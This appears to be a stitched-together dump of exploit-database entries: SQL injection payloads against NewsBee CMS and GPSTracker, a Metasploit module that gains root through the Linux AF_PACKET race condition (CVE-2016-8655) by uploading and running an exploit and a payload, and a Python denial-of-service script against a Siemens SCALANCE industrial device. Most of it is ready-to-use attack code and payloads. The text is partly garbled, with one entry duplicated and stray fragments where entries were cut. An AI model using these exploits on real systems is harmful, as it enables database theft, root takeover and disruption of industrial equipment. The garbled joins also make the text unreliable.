- KVA Shadowing should be disabled and the relevant security update should be uninstalled.
- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44697.zip
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
Payload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=5' AND (SELECT 7446 FROM(SELECT
COUNT(*),CONCAT(0x7178707871,(SELECT
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
# Type: AND/OR time-based blind
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
# Type: UNION query
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AF_PACKET chocobo_root Privilege Escalation',
'Description' => %q{
This module exploits a race condition and use-after-free in the
packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in
the Linux kernel to execute code as root (CVE-2016-8655).
The bug was initially introduced in 2011 and patched in 2016 in version
4.4.0-53.74, potentially affecting a large number of kernels; however
this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as
Linux Mint.
The target system must have unprivileged user namespaces enabled and
two or more CPU cores.
Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on Linux Mint 17.3 (x86_64);
Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel
versions 4.4.0-45-generic and 4.4.0-51-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rebel', # Discovery and chocobo_root.c exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Aug 12 2016',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'chocobo_root.c' ],
[ 'EDB', '40871' ],
[ 'CVE', '2016-8655' ],
[ 'BID', '94692' ],
[ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],
[ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],
[ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],
[ 'URL', 'https://usn.ubuntu.com/3151-1/' ],
[ 'URL', 'https://www.securitytracker.com/id/1037403' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]
],
'DefaultTarget' => 0))
register_options [
OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def timeout
datastore['TIMEOUT'].to_i
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c -lpthread"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
cores = get_cpu_info[:cores].to_i
min_required_cores = 2
unless cores >= min_required_cores
vprint_error "System has less than #{min_required_cores} CPU cores"
return CheckCode::Safe
end
vprint_good "System has #{cores} CPU cores"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
CheckCode::Appears
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('chocobo_root.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('chocobo_root')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status "Launching exploit (Timeout: #{timeout})..."
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path}.."
rm_f executable_path
rm_f payload_path
end
end
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
iPayload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=5' AND (SELECT 7446 FROM(SELECT
COUNT(*),CONCAT(0x7178707871,(SELECT
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
# Type: UNION query
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
# Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions.
# Tested on: Kali Linux
# CVE: CVE-2016-3963
#!/usr/bin/python
import socket import sys if len(sys.argv) < 2: print('Usage: ' +
sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' +
sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00
00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock =
socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload,
(sys.argv[1], 5000000))
# Exploit Title: GPSTracker v1.0 - Login Page SQL Injection
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.wecodex.com
# https://codecanyon.net/item/gpstracker-gps-trackgin-system/21873663
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
because it fails to sufficiently sanitize user-supplied data before using
it in an SQL query.Exploiting this issue could allow an attacker to
compromise the application, access or modify data, or exploit latent
vulnerabilities in the underlying database.
====================================================
# PoC : SQLi :
http://test.com/fotracking/account/signin
POST /fotracking/account/signin HTTP/1.1
Host: 188.165.129.80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://test.com/fotracking/login
Content-Length: 32
Cookie: PHPSESSID=ikk8m7o6v54836u6a36sr6qko1
Connection: keep-alive
id=democlient&password=test12345
Vulnerable Payload :
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=democlient' AND 8345=8345 AND
'jDLh'='jDLh&password=test12345
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=democlient';SELECT SLEEP(5)#&password=test12345
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=democlient' AND SLEEP(5) AND 'yGiF'='yGiF&password=test12345
====================================================
# Exploit Title: NewsBee CMS 1.4 - 'download.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578' AND 2043=2043 AND 'KzTm'='KzTm&t=gallery
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=578' AND (SELECT 7126 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(7126=7126,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hOBA'='hOBA&t=gallery
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578' AND SLEEP(5) AND 'KlSV'='KlSV&t=gallery
# Type: UNION query
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
# PoC: SQLi:
# Parameter: t
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 7854=7854 AND 1059=1059#
# Type: error-based
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 8962=8962 AND (SELECT 1892 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(1892=1892,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eLUC
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 5549=5549 AND SLEEP(5)-- RUaY